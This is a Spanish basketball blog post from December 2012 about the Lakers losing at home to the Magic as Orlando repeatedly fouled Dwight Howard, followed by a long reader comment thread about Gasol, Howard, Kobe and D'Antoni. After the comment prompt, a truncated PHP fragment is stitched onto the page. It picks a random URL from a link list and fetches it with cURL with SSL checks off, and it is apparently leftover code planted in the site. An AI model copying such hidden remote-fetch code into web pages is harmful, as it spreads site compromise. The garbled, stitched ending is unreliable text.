La Crónica: Hack-a-Howard

03 de December de 2012 por txusma

“La juerga” no fue tal y si alguien apostó a favor de los Magic se habrá llevado un buen pellizco para casa. A 15-1 se pagaba la broma, como informaba anoche nuestro compañero Denise.

Dwight Howard se enfrentaba por primera vez a su ex-equipo y este le tenía preparada una cruel sorpresa. En el último cuarto, con el partido igualado, sus ex-compañeros no dudaron ni un momento en hacerle falta y llevarle una y otra vez a la línea de personal. “Hack-a-Howard” en toda regla. El pívot de los Lakers respondió con un 7 de 14 y sus compañeros aún pudieron dar gracias porque en el resto del partido su acierto fue ridículo: 2 de 7. Howard nunca ha sido un buen tirador de tiros libres pero esta temporada su principal defecto está emergiendo en todo su esplendor. Es posible que ahora se acuerde de los veranos al sol que se ha pegado cuando podría haber trabajado para mejorar su lanzamiento. No olvidemos que lejos de evolucionar, Howard ha involucionado en este aspecto. Entró en la liga anotando el 67% de sus lanzamientos y se ha mantenido por encima del 58% toda su carrera hasta los 2 últimos años, en los que su acierto ha caído por debajo del 50%.

Así las cosas, con Howard fallando tiros libres como una escopeta de feria y los Magic enchufados desde más allá de la línea, un parcial de 12-2 finiquitaba el partido en los últimos minutos. Los Lakers no se habían encontrado cómodos en ningún momento y no habían podido aplicar el ritmo que tanto les benefició en el partido frente los Nuggets. Kobe volvió a ser el mejor le guste o no a sus detractores y Gasol siguió a ese nivel de mediocridad al que nos tiene acostumbrados este año (con taponazo incluido de un Glen Davis que apenas llega a 2’00m). Se habla de que podría salir desde el banco en beneficio de Jamison. Lo que parece más que probable es que el español no viva la Semana Santa vestido de amarillo. Por los Magic, gran partido de Jameer Nelson y Arron Afflalo que consiguó su mejor marca anotado desde que está en los Magic. Davis, Vucevic y Reddick también respondieron. 

Los que no aflojan son los Knicks que ya llevan 7 victorias y 0 derrotas en el Madison. Con un Carmelo extra motivado, un sólido Tyson Chandler y un Raymond Felton que parece necesitar la camiseta de NY para sacar lo mejor de si mismo, el equipo de los Gran Manzana liquidó a los Suns en media parte. Ni la expulsión de Shed al final del primer cuarto por protestar “como un cavernícola al que le han robado el ciervo” les descentró. Enfrente, unos pobres Suns fueron superados en todo momento y solo Gortat dio realmente la cara.

PREMIOS

MVP: A Arron Afflalo al aro se le hizo tan grande como una piscina: anotó 30 puntos con un 11 de 18 en tiros de campo y además capturó 5 rebotes y repartió 5 asistencias. Su compañero Jameer Nelson consiguió un doble-doble de 19 puntos y 13 asistencias.

Rookie: Sólido partido de Chris Copeland en los 10 minutos que disfrutó. Acabó con 8 puntos, 3 rebotes, 2 asistencias, 1 robo y 1 tapón.

Decepción: El 9 de 21 en tiros libres de Dwight Howard es digno de las peores pesadillas pero la vacuidad del juego de Michael Beasley merece nuestro premio y cualquier descenso a los infiernos de Dante.

Esfuerzo en vano: Otro buen partido de Kobe Bryant que se queda sin premio. 34 puntos, 7 rebotes y 5 asistencias que pasan a engrosar el dato que os presentamos a continuación.

EL DATO

Los Lakers han ganado 2 de los 10 partidos en los que Kobe ha anotado más de 25 puntos. En cambio, están 6-1 cuando Kobe anota menos de 25.

Imágenes | AP Photos / Getty Images

Comenta

38 comentarios a esta entrada

  1. nba dice:
    #1

    Supongo que esperaran un poco a que vuelva Nash, pero me da a mi que en su gira on-the-road van a cosechar un buen parcial negativo, evaluaran cual es la mejor oferta que reciben por Pau y puerta, gracias por los servicios prestados, es que contra Magic no se puede perder de ninguna de las maneras y mas en el Staples, A ver si consiguen alguien interesante

      Citar

  2. GreenPride dice:
    #2

    Madre mía con los Lakers, perder en casa con los Magic y acabando con un parcial de 31-9? Se ha demostrado una vez más que Howard no puede jugar los últimos cuartos de ningún partido igualado, lo que le lastra como supuesto pivot dominante y deja a su equipo en pañales en estos minutos, y mientras Pau viéndolo del banquillo en una situación que no parece tener arreglo. Él está jugando muy mal y no parece que ya nadie tenga confianza en su juego en LA. Todo apunta a traspaso pero con su contrato y su edad no va a ser fácil para los Lakers encontrarle destino.
    Desde luego este equipo de LA es desconcertante, unos días parece en vías de recuperación y al día siguiente se hunde otra vez. Ahora les toca un viaje y muchos partidos fuera lo que hasta ahora han sido derrotas. O mejoran y empiezan a ganar on-the-road o la crisis puede ser increíble en el equipo. Derrotas como esta son imperdonables.
    El Dato final de la crónica es demoledor, cuando Kobe deja de confiar en sus compañeros, derrota segura… aunque a veces sus compañeros hacen mucho para que Kobe no confíe en ellos

      Citar

  3. GreenPride dice:
    #3

    Y por cierto, repasando estadísticas:
    Glen Davis + Vucevic = 40 puntos, 24 rebotes
    Pau + Howard = 32 puntos, 22 rebotes
    ¿Que clase de broma es esta? Para hacérselo mirar

      Citar

  4. Sancho88 dice:
    #4

    Woww!! Me vi la primera parte y nadie podía decir que iban a ganar los Magic… acojonante. Bryant estaba haciendo un partidazo impresionante, esta vez nada de chupón ni mierdas, las mete todas y punto. Howard tiene que espabilar y meterlas desde el tiro libre, menudas mandarinas se tira… Otra opción es, si ves que están atizándole a propósito, juega un small ball con Meeks, Bryant, Jamison por fuera y solo Pau dentro que tiene muchos mejores porcentajes. Es decir, sienta a Howard y al menos aprovechas que los otros también pueden ganarles a los Magic. Es la trampa en la que siempre caen. Es de cajón, si le están atizando al peor lanzador de tiros libres del mundo, y ves que no vas a ganar el partido, siéntalo y obliga al rival a hacer otra cosa. Dásela a Bryant, métele balones dentro a Pau (cuando juega de 5 puro con Jamison al lado mejora un huevo, de hecho, hasta el descanso, el error de D’Antoni fue quitar a la segunda unidad cuando lo estaban controlando en el segundo cuarto. Metió al quinteto y los Magic empataron en el descanso. Hasta ahí vi. En serio, que nula visión de juego tiene D’Antoni. O juegan a lo que él sabe, o ya no tiene ni plan b, ni mucho menos plan c. Cómo se puede ser tan limitado con la pizarra o con la imaginacion?

      Citar

  5. Denise dice:
    #5

    Pues eso, otra vez los Magic liandosela a los Lakers, creo que deben ser el equipo al que más veces le han ganado en lo últimos 5 años.

    A primera vista parecía una derrota clara de los azules, en la mayoría de las previews se decía que Nelson no jugaría, lo que lastraría aun más la poca profundida de la plantilla.

    Pero jugó y vaya si lo hizo, 19-13 para destrozar a Morris (horrendo jugador) y a todo el perímetro amarillo. Afflalo ametrelleando el aro y desgastando a Kobe tanto en ataque como en defensa, sobre todo en la segunda parte; y un hombrecillo bajo y gordo al que muchos infravaloran llamado Glen Davis y un seminuevos como Vucevic comiendose a la mejor pareja interior de la Liga.

    Los Magic juegan bastante bien, está claro que no entrarán en playoffs y que recibirán mas de 10 palizas de 30 puntos, pero aún así, sin ningún jugador franquicia en el equipo y con 2 bajas tan sensibles como Harrington y Turkoglu, yo creo que el rendimiento del equipo es bastante notable en relación a su calidad. Son atrevidos, juegan alegre y tienen carácter.

    Por los Lakers, Bryant estaba enchufado, el único por los amarillos, pero una vez que dejó de ver el aro como una piscina, los Lakers cayeron en picado. Howard no termina de estar bien, no solo en ataque y en el tiro libre, sobre todo en defensa, está muy pero que muy blandito y eso lo acusan los californianos.

    Por otra parte, no entiendo la rotación de D’Antoni cuando Meeks no juega casi nada después de meter 21 puntos, y donde Ebanks juega casi un cuarto cuando parecía estar desertado de la rotación.

    En fín, quien diría que, a estas alturas, el mejor jugador de L.A. en relación a su calidad habitual sería Metta World Peace. Pintan mal los Lakers, ya han cambiado el entrenador, por lo que lo próximo será el traspaso de Pau, el cual creo que no llegará a fin de año.

    Yo tambien traspasaría a Blake y a Morris lo cortaría de inmediato, para mí uno de los peores jugadores que he visto en años en mi vida en la NBA, Smush Parker a su lado era Dios.

      Citar

  6. Sancho88 dice:
    #6

    Hostias, realmente el Morris este es un paquete como pocas veces he visto tio. Mira que he visto gentuza, como el Robert Pack, Troy Bell y mierda así, pero este es demasiado malo, osea, no valdría ni para un UCAM Murcía o un Valladolid. Es una puta mierda.

    Sobre los Magic, no sé quien es el entrenador, pero el tío se ve que les ha dicho, sois jóvenes, no teneis nada que perder, salid ahí y jugad bonito al menos, respetad el baloncesto y haced movimientos en ataque. Y ahí hay tios con un huevo de fundamentos. El gordo igual es gordo, pero el tipo tiene talento para aburrir, y mira si se tira a por el Pau o a por quién sea con un par de pelotas, no le tiene miedo a nadie. Luego, el salto cualitativo de Vucevic con respecto al año pasado es flipante. Yo le veia un Vesely de la vida en los Sixers, y ahora diría que es uno de los jugadores con mayor proyección de la liga, me gusta mucho. Luego Ayón me parece una mierda, ya lo sabéis. Me gusta mucho Nicholson, Moore es más malo que la droga pero al menos hace las cosas que sabe hacer y no se complica la vida. Ve tio abierto, zaska, le da el pase, ve triple solo, zaska, se la tira. No se complica ni un pelo. Josh McRoberts es más malo que la droga el hijo de puta, Nelson conoce el juego eso es indudable, y el tío es capaz de liderar a su equipo. Yo siempre dije que es un jugador infravaloardo. Y Aflallo está mejorando con respecto al inicio de temporada.

    En el global, el equipo es una mierda, no entrará en playoffs, pero al menos como bien dices divierten al personal y coño, respetan el basket y pelean los partidos. Osea, no es infumable ver un partido de los Magic. Se pueden sacar bastantes cosas interesantes de sus movimientos ofensivos

      Citar

  7. Sancho88 dice:
    #7

    Ah, ok, lo he mirado. Jackie Vauhgn. Este no jugaba en los Warriors, Wizards, los propios Magic? Jugó en la ACB incluso?? de qué coño me suena. Tenía un hermano gemelo o algo asi?

      Citar

  8. Denise dice:
    #8

    Hablando de memoria, Vaughn fue el base de aquellos horribles Magic que se metian en playoffs gracias a los 30 puntos por noche de McGrady y la ayuda que recibía de rookies como Mike Miller, Gordan Giricek y Drew Gooden . En aquellos tiempos, los Magic conseguían entrar en Playoffs con gente como Sasser, De Clerq, Garrity, Armstrong, Kemp y Horace Grant acabados, Grant Hill lesionado, Pat Burke, Steven Hunter con ese fisico que tenia y sus 2 puntos por partido, Ryan Humphrey..en fin.

    A mi me gusta mas Harkless que Nicholson pero bueno ahí andan, a ver si progresan, Moore no es malo, tecnicamente tiene calidad y es joven, y es el típico microondas que de vez en cuando te puede reventar un partido aunque a veces es algo anarquico, pero es un jugador valido en un roster. Es una especie de Jannero Pargo a buen nivel. Vucevic ha mejorado un monton, y Ayón me gustaba en Hornets pero de momento en los Magic es un estorbo, nada bueno.

    Y no quiero ser pesado porque lo he dicho varias veces, pero no sé porque Lakers cortaron a Goudelock y dejaron a este Morris.

      Citar

  9. Sancho88 dice:
    #9

    Coño, ya sé quien decía yo joder. Vonteggo Cumminghs, no Jacque Vaughn…

      Citar

  10. Blade Petrovic dice:
    #10

    Por cierto Iverson deshauciado de su mansion y hay rumores de que busca equipo desesperadamente.No le van las cosas muy bien a The Answer

      Citar

  11. HisRoyalAirness dice:
    #11

    He de decir que, visto el partido, mientras Pau estuvo en pista los Lakers estuvieron arriba. Fue el mejor del primer tiempo con 11-5 y después D´Antoni metió a Jamison porque sí (que no defiende ni a la madre que me parió).
    Cuando estaban con el Hack, el catalán estaba mirando desde el banquillo en vez de ser cambiado por Howard.

    Ayer no tuvo culpa de NADA.

    Ah, y digo lo mismo, Kobe es un experto en engordar estadísticas y en hacer, una vez más, Kobe-System porque le sale de los huevos.
    Ya está bien de caritas de reproche y mandíbula para fuera, que por muchos números que hiciese su partido fue una mierda y no sabe implicar a nadie. Eso no es un líder

      Citar

  12. Sancho88 dice:
    #12

    Por fin dice alguien la verdad, y es que Pau ayer no fue el culpable… Ya digo, mientras él estuvo en pista en la primera mitad, el equipo fue bien. Howard y Bryant +/-17, Pau -3

      Citar

  13. nba dice:
    #13

    A ver que no decimos que Pau sea el culpable de todo, ya que D’Antoni se encarga de fijar los focos sobre el larguirucho blanco que se sienta en el banquillo durante el ultimo cuarto, ya sabemos que a los Lakers mientras este Bryant hay que hacer las cosas como manda el capo, por lo que lo mejor para Pau y Lakers es que salga antes de fin de año, y obtengan algo de provecho para el juego exterior

      Citar

  14. Sancho88 dice:
    #14

    Lo que pasa es que el sacrosanto Bryant sabe en el fondo de su corazón, que de no haber sido por el larguiducho blanco, él no estaría ya en los Lakers, porque se habría ido aquel año 2008, y además, no tendría 5 anillos sino 3. Qué deje de insultarle en público, se reuna con D’Antoni y le explique algunas cosas sobre Pau, a ver si de una vez le ponen a jugar donde él sabe. Talento más mal aprovechado no he visto jamás. Osea, un tipo que lleva a su equipo nacional a dos finales olímpicas, y ahora resulta que no vale para jugar seis minutos finales contra los jodidos Orlando Magic. Venga ya por favor…

      Citar

  15. GreenPride dice:
    #15

    Creo que está claro que D’Antoni no está sabiendo usar a Pau como tampoco lo hizo Brown. Tal como están las cosas lo mejor para Pau es un traspaso. Si D’Antoni fuese inteligente le daría a Pau el mando de la segunda unidad haciendo a Jamison titular para crear espacios para Howard y luego aprovechar a Pau por dentro cuando cambie a Howard. Y cuando más participe del juego cuando coincidan haciéndole jugar de pivot pasador desde la bombilla, muy al estilo de lo que hace Marc en los Grizzlies, pero claro en Lakers parece que nada funciona como debiera y si la vuelta de Nash no les hace empezar a ganar van a rodar cabezas en ese equipo más pronto que tarde

      Citar

  16. Simón dice:
    #16

    Es que lo de Pau es rarísimo porque por lo menos si tienes claro que no lo quieres como asi parece que pasa en Los Angeles dale mas bola que haga numeritos y demuestre ( o al menos lo parezca ) que sigue siendo de los mejores en su posición, ( yo digo que motivado y sintiendose improtante lo es sin duda ). Pero no, en LA cada vez se encargan de desquiciarlo mas y que parezca que esta peor aun de lo que está. Esta no es ni la forma de sacar algo realmente provechoso en un traspaso y tampoco es la mejor manera de involucrarlo para que de verdad marque las diferencias en favor de LA…
    no se… creo que al final acaban comiendoselo o traspasandolo por medianias… fijaos que vista la situación hasta me empieza a parecer bueno un traspaso a pelo por Stoudmire… cuando hace dos semanas decía pero menudo timo a Lakers sería!!! incluso hoy viendo la situación que se vive se me ha ocurrido algo asi como Ilyasova + Gooden + Dunleavy por Pau pero creo que visto el cartel que tiene Pau incluso eso me parece dificil…

      Citar

  17. nba dice:
    #17

    Lo de Skiles empieza a ser un poco raro, no se a que viene lo del palo y la zanahoria con Ilyasova y Gooden, pero primero tienen que decidir si quieren a Jennins y en funcion de ese ponerse a buscar movimientos

      Citar

  18. TheDeerHunter dice:
    #18

    Estamos en modo victimismo on.
    Desconozco quién le ha echado las culpas a Gasol de todas las desgracias de los Lakers. Para mí eso no es cierto. De hecho, a poco que nos demos una vuelta por la red podemos ver diferencias claras en cómo se le está tratando respecto a otras ocasiones verdaderamente sangrantes. Ni remoto punto de comparación.

    Desconozco quién le ha insultado… si el insulto es que le dejen un cuarto sentado por un compañero que le da otro aire táctico al equipo, y que para más inri lo está empezando a hacer bastante bien, me parece que nos estamos volviendo locos. Me parecería muy triste intentar defenderle hasta ese punto. Pau no necesita ese tipo de condescendencia.
    Las declaraciones de Kobe ni remotamente me parecen un insulto. Más bien me parecen más sensatas que otra cosa, y yo estoy 100% de acuerdo que la situación de Pau está en sus propias manos. Tema de culpas, ahí vamos… Pau es culpable de su propia situación, que no es nada buena.
    Otra cosa es que sin funcionar se especule con su salida. Esa posibilidad no debería de sorprender a nadie a estas alturas y tiene sólo parcialmente que ver con su rendimiento actual.

      Citar

  19. Denise dice:
    #19

    Hombre, más allá de que a Pau lo pongan a 7 metros a jugar, en su mano está echarle 2 huevos al entrenador y a la poca táctica de su equipo y meterse para dentro.
    O si no tendremos un caso Rudy 2, un tio que se limitaba a quedarse en la esquina sin hacer ningun otro recurso táctico y técnico y despues le echaba la culpa al bueno de McMillan.
    Pero Pau es siempre tan politicamente correcto, que a veces le hace parecer ser un cagao.

    Pau, como se que lees este blog, Echale Huevos y metete en la pintura!! …..(y ahora es cuando Pau se marcará 30 puntos en el próximo partido..xD)

      Citar

  20. Txusma dice:
    #20

    Y puede ser que sea imposible que Dwight Howard juegue al lado de otro 7 pies? Sus últimos compañeros han sido Ryan Anderson y Rashard Lewis, jugadores que se iban a línea de 3 y le dejaban todo el campo abierto para él. A lo mejor queremos que Howar d y Gasol funcionen a cualquier y es posible que las cosas no son nada fáciles. Ya el año pasado un Bynum más importante y Gasol, no acabaron de congeniar.
    Me da que a Gasol le va tener al lado un 5 tronco, defensivo, al estilo Perkins que simplemente le deje descansar en defensa defendiendo al bueno del otro equipo y que se aparte en ataque para que él resuelva.

      Citar

  21. melo15 dice:
    #21

    Perdona Txusma pero me ha parecido oir Chandler?

      Citar

  22. Denise dice:
    #22

    melo15:
    Perdona Txusma pero me ha parecido oir Chandler?

    Pero tu no eras fan de Amare? xD

      Citar

  23. Chipi dice:
    #23

    Para mí lo verdaderamente sangrante es que un tío que juega en la élite se casque un 9/21 en tiros libres, y sin ser de sus peores noches. No me entra en la cabeza. Ni siquiera los más troncos que veo jugar en LEB Plata.

      Citar

  24. TheDeerHunter dice:
    #24

    Ah ¿que el único problema de Pau es que lo ponen a jugar a 7 metros??
    No sé qué decirte. Yo no lo veo ni remotamente así. Casi te diría que es mejor que no le hagan postear mucho, que si no aún queda más en evidencia todavía.

      Citar

  25. Pop dice:
    #25

    TheDeerHunter:
    Estamos en modo victimismo on.
    Desconozco quién le ha echado las culpas a Gasol de todas las desgracias de los Lakers. Para mí eso no es cierto. De hecho, a poco que nos demos una vuelta por la red podemos ver diferencias claras en cómo se le está tratando respecto a otras ocasiones verdaderamente sangrantes. Ni remoto punto de comparación.

    Desconozco quién le ha insultado… si el insulto es que le dejen un cuarto sentado por un compañero que le da otro aire táctico al equipo, y que para más inri lo está empezando a hacer bastante bien, me parece que nos estamos volviendo locos. Me parecería muy triste intentar defenderle hasta ese punto. Pau no necesita ese tipo de condescendencia.
    Las declaraciones de Kobe ni remotamente me parecen un insulto. Más bien me parecen más sensatas que otra cosa, y yo estoy 100% de acuerdo que la situación de Pau está en sus propias manos. Tema de culpas, ahí vamos… Pau es culpable de su propia situación, que no es nada buena.
    Otra cosa es que sin funcionar se especule con su salida. Esa posibilidad no debería de sorprender a nadie a estas alturas y tiene sólo parcialmente que ver con su rendimiento actual.

    Bueno, Deer, yo ví el partido anoche y no dejó a Pau en el banco el último cuarto por darle otro aire táctico al equipo. Yo creo que fue un castigo en toda regla: Jamison llevaba jugando un chorro de minutos con Pau, lo cambian, en la siguiente jugada Pau rehuye tirar 3 veces consecutivas en posiciones francas (el público silba) y directamente vuelve a sacar a Jamison (que tampoco hizo ningún partidazo), que no había estado sentado ni 1 minuto. La cara de Pau cuando lo ve en la banda preparado es un poema. Y encima luego en el Hack a Howard, con los Magic haciendo faltas a media cancha para llevarlo a la línea y además fallandolos de 2 en 2, D’Antoni ni si inmuta. Si saca a Pau por D12 eso no lo pueden hacer los Magic y por lo menos intentas jugar.

    Sea merecido o no (lo cierto es que Pau empezó fantástico y luego se diluyó como un azucarillo), para mí es un castigo en toda regla.

    Tema este aparte, lo cierto es que los únicos Lakers que se portaron fueron MWP y Kobe (no sé qué críticas se le están haciendo a Kobe, no lo entiendo). Howard puede parecer que lo hizo bien con los números, pero en verdad estuvo casi horroroso. Es incapaz de meter nada que no sea machacando el aro, hace muchas faltas ofensivas, la mayoría de los rebotes los cogió sólo y tampoco estuvo brillante en defensa. Eso por no hablar de sus nefastos tiros libres, losa mortal para su equipo. Creo recordad que llegó a estar con 1 de 9 o algo así.

      Citar

  26. Sancho88 dice:
    #26

    Realmente, Howard está limitado por todos sitios. Osea, es jugador de baloncesto porque es grandullón y tiene unas espaldas que parece un armario empotrado, pero es el típico que coges por la calle y le dices… tu ponte ahí en una cancha de basket que algo harás… Vamos a ver, si no juegan para él, el tipo no tiene absolutamente nada, y además no se pega casi ni por los rebotes ofensivos y en defensa Ibaka se coloca mil veces mejor. No sé, esperemos que todo esto le ocurra porque aún tiene que ganar movilidad en la espalda, pero todo lo que hace es, efectivamente, porque sus compañeros le buscan para que haga algún mate, pero por sí mismo es incapaz de generarse ningún tiro, y ese movimiento in and out de Pau, Howard no lo tiene ni de coña.

    Por cierto, nosotros se las tiramos a Deer con Kobe, y ahora a los Pauístas nos has dicho que no sabe postear… Me provoca cierta carcajada…

      Citar

  27. lost dice:
    #27

    Que ganas de que llegue el 13-D. Lakers visitan el Madison. Pringles llega al Madison demostrando que su éxito empieza y acaba con Nash. Carmelo vs Kobe. Show Time contra defensa. Poco a poco volvemos a los 90

      Citar

  28. Esteban dice:
    #28

    Sancho88:
    Realmente, Howard está limitado por todos sitios. Osea, es jugador de baloncesto porque es grandullón y tiene unas espaldas que parece un armario empotrado, pero es el típico que coges por la calle y le dices… tu ponte ahí en una cancha de basket que algo harás… Vamos a ver, si no juegan para él, el tipo no tiene absolutamente nada, y además no se pega casi ni por los rebotes ofensivos y en defensa Ibaka se coloca mil veces mejor. No sé, esperemos que todo esto le ocurra porque aún tiene que ganar movilidad en la espalda, pero todo lo que hace es, efectivamente, porque sus compañeros le buscan para que haga algún mate, pero por sí mismo es incapaz de generarse ningún tiro, y ese movimiento in and out de Pau, Howard no lo tiene ni de coña.

    Por cierto, nosotros se las tiramos a Deer con Kobe, y ahora a los Pauístas nos has dicho que no sabe postear… Me provoca cierta carcajada…

    bue sancho, que hoy howard no este en su mejor nivel no significa que no sirva, pon en youtube howard vs bynum y lo veras mano a mano con pau o bynum lanzando un gancho de izquierda hermoso e idenfendible
    que no rebotea? hace dos dias se fue hasta los 20 y en el no llama la atencion
    que ibaka es mejor defensor? hoy quiza si, pero cuando se ponga bien, no hay con quien compararlo

    que pivote corre la cancha como el?

    vamos howard es por lejos el mejor pivote de la liga, y pivotes no hay mucho

    pau es uno de los mejores 4 de la nba, pero justamente, 4 hay muchisimos

      Citar

  29. lost dice:
    #29

    Con lo de que Ibaka es mejor defensor discrepo, mucho. Ibaka es, seguramente, el mejor defensor interior en la defensa zonal, en las ayudas es brutal; pero en la defensa individual deja mucho que desear. Howard es de los mejores en la individual y en la zonal, pero no el mejor. En la zonal es Ibaka, y en la individual Chandler. Ahora Howard está en una forma bastante pésima, Ibaka no está al 100% y Chandler se pega minutadas de escándalo. Esta temporada veremos quien es el defensor más TOP.

    PD: Siento haber abierto este tema

      Citar

  30. Sancho88 dice:
    #30

    Hostia, los Bobcats se están follando a los Blazers muy gravemente. Yo me voy a poner a ver el partido. En nba.com han metido dos mates de MKG y Mullens que ya no son con muelles, son con la máquina de propulsión voladora de Robocop… en serio, no os los podéis perder.

    Tema aparte, aleros del draft 2012. Más allá de que la mayoría no han despegado aún, osea, ver la planta física y lo que están haciendo algunos de ellos es flipante, y la mayoría tiene pinta de hacer buena carrera en la NBA. MKG, Harrison Barnes, Perry Jones, Terrence Jones, Moe Harkless, Jae Crowder, Jeff Taylor… y Royce White si resuelve su problema de pánico y demás… es una hornada muy interesante. Por cierto, alguien sabe por qué no juega Darius Morris en los Hornets? También se supone que tiene una pinta tremenda este chico. A mí este draft me parece un draft buenísimo, y más allá de que muchos no están jugando de momento, el potencial es brutal

      Citar

  31. Sancho88 dice:
    #31

    Ha sido un partidazo, Luke Babbit como elemento diferenciador con un triplazo en la prórroga y también antes de la prórroga, una remontada de flipar de los Blazers…

      Citar

  32. TheDeerHunter dice:
    #32

    Por cierto, nosotros se las tiramos a Deer con Kobe, y ahora a los Pauístas nos has dicho que no sabe postear… Me provoca cierta carcajada…

    Yo he sido de toda la vida más de Pau que de Kobe. Está todo escrito en este mismo blog, así que no me cuentes milongas. Quizás sea por eso por lo que me duele tanto que seamos tan condescendientes con un nivel de juego injustificable… y peor aún con los primeros desbarres de diva que le hayamos visto y que personalmente decepcionan desorbitadamente.

    Después yo no he dicho que no sepa postear. Ha sido uno de los mejores, no estoy loco. He dicho que en el estado que se encuentra los últimos tiempos no es capaz de hacerlo con eficacia. Más bien al contrario…
    En este mismo blog y también se puede leer se ha culpado a Phil Jackson de eso, después a Brown culpable hasta del hambre en Somalia… y ahora a D’Antoni.

    @Pop: Desconozco qué razones tuvo D’Antoni para hacer eso esta ocasión. Pero el hecho es que ha ocurrido sólo dos veces y el mosqueo ya es atronador. A mí me parece perfectamente lícito que en un momento dado, por las razones que sean juegue Jamison en lugar de Pau. De hecho aquí hasta los más fanáticos defensores de Pau están sugiriendo que juegue de 6º desde hace algún tiempo (me pregunto qué diría él)
    Te aseguro que si Pau se pone las pilas eso va a suceder muy pocas veces… aunque es más fácil lloriquear, claro.

      Citar

  33. Jose Luis dice:
    #33

    Sancho, Darius Morris es ese base sophomore de los Lakers que tan desastroso os parece… ¿a quien te referías en tucomentario de los Hornets? ¿Austin Rivers?

      Citar

  34. Pop dice:
    #34

    TheDeerHunter:

    @Pop: Desconozco qué razones tuvo D’Antoni para hacer eso esta ocasión. Pero el hecho es que ha ocurrido sólo dos veces y el mosqueo ya es atronador. A mí me parece perfectamente lícito que en un momento dado, por las razones que sean juegue Jamison en lugar de Pau. De hecho aquí hasta los más fanáticos defensores de Pau están sugiriendo que juegue de 6º desde hace algún tiempo (me pregunto qué diría él)
    Te aseguro que si Pau se pone las pilas eso va a suceder muy pocas veces… aunque es más fácil lloriquear, claro.

    No, si yo no digo que no tuviera razón. Digo que la decisión de sentar a Pau en el último cuarto fue por azotarle en el culo, más que por aspectos técnicos.

    Pau…Pau parece haber envejecido 8 años de pronto. Yo estoy pasándolo mal viéndole jugar.

      Citar

  35. TheDeerHunter dice:
    #35

    Pau…Pau parece haber envejecido 8 años de pronto. Yo estoy pasándolo mal viéndole jugar.

    Y yo también

      Citar

  36. Denise dice:
    #36

    Sancho88:
    Realmente, Howard está limitado por todos sitios. Osea, es jugador de baloncesto porque es grandullón y tiene unas espaldas que parece un armario empotrado, pero es el típico que coges por la calle y le dices… tu ponte ahí en una cancha de basket que algo harás… Vamos a ver, si no juegan para él, el tipo no tiene absolutamente nada, y además no se pega casi ni por los rebotes ofensivos y en defensa Ibaka se coloca mil veces mejor. No sé, esperemos que todo esto le ocurra porque aún tiene que ganar movilidad en la espalda, pero todo lo que hace es, efectivamente, porque sus compañeros le buscan para que haga algún mate, pero por sí mismo es incapaz de generarse ningún tiro, y ese movimiento in and out de Pau, Howard no lo tiene ni de coña.

    Por cierto, nosotros se las tiramos a Deer con Kobe, y ahora a los Pauístas nos has dicho que no sabe postear… Me provoca cierta carcajada…

    Hombre, yo creo que te pasas un poco con Howard, en su ultimo año con los Magic, el tipo se sacaba de la manga algunos movimientos muy buenos, y conseguia una gran efectividad con ese movimiento para dentro de dos pasos y semigancho. Si se sabe jugar para él, es un tio que se te puede ir facilmente a los 23 puntos y el día en que le entran los libres a 35.
    La verdad es que creo que todavia no está fisicamente al 100%.

      Citar

  37. Pop dice:
    #37

    Denise: Hombre, yo creo que te pasas un poco con Howard, en su ultimo año con los Magic, el tipo se sacaba de la manga algunos movimientos muy buenos, y conseguia una gran efectividad con ese movimiento para dentro de dos pasos y semigancho. Si se sabe jugar para él, es un tio que se te puede ir facilmente a los 23 puntos y el día en que le entran los libres a 35.
    La verdad es que creo que todavia no está fisicamente al 100%.

    Yo estoy muy de acuerdo con Sancho. Yo los ganchos que le he visto este año son pedradas a 1 metro del aro. En movimientos es casi nulo. El gran problema es el que tú apuntas: si no está al 100% físicamente baja su rendimiento de forma espantosa. Como no aprenda algún arma más en cuanto esté más cascado por la edad va a ser un don nadie. Que el domingo metió 5 canastas, y de los tiros libres que intentó a lo mejor 4 los provocó él. El resto de puntos fueron regalados por el Hack.

    Hasta un oso como O’Neal, jugando con 35 años, con un sobrepeso atroz y las rodillas y la espalda bien achicharradas, seguía siendo una pesadilla para los rivales. Porque era algo más que su físico.

      Citar

  38. Sancho88 dice:
    #38

    Jose Luis:
    Sancho, Darius Morris es ese base sophomore de los Lakers que tan desastroso os parece… ¿a quien te referías en tucomentario de los Hornets? ¿Austin Rivers?

    Darius Morris dije??? jejej, quería decir Darius Miller. Debutó ayer además, con ovación del respetable que estuve viendo el partido. Hablan maravillas de él, habrá que seguirle la pista. Además, solo tiene a Aminu por delante. A nada que haga le comerá la tostada. Rivers es mierda, peor que Fredette el año pasado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>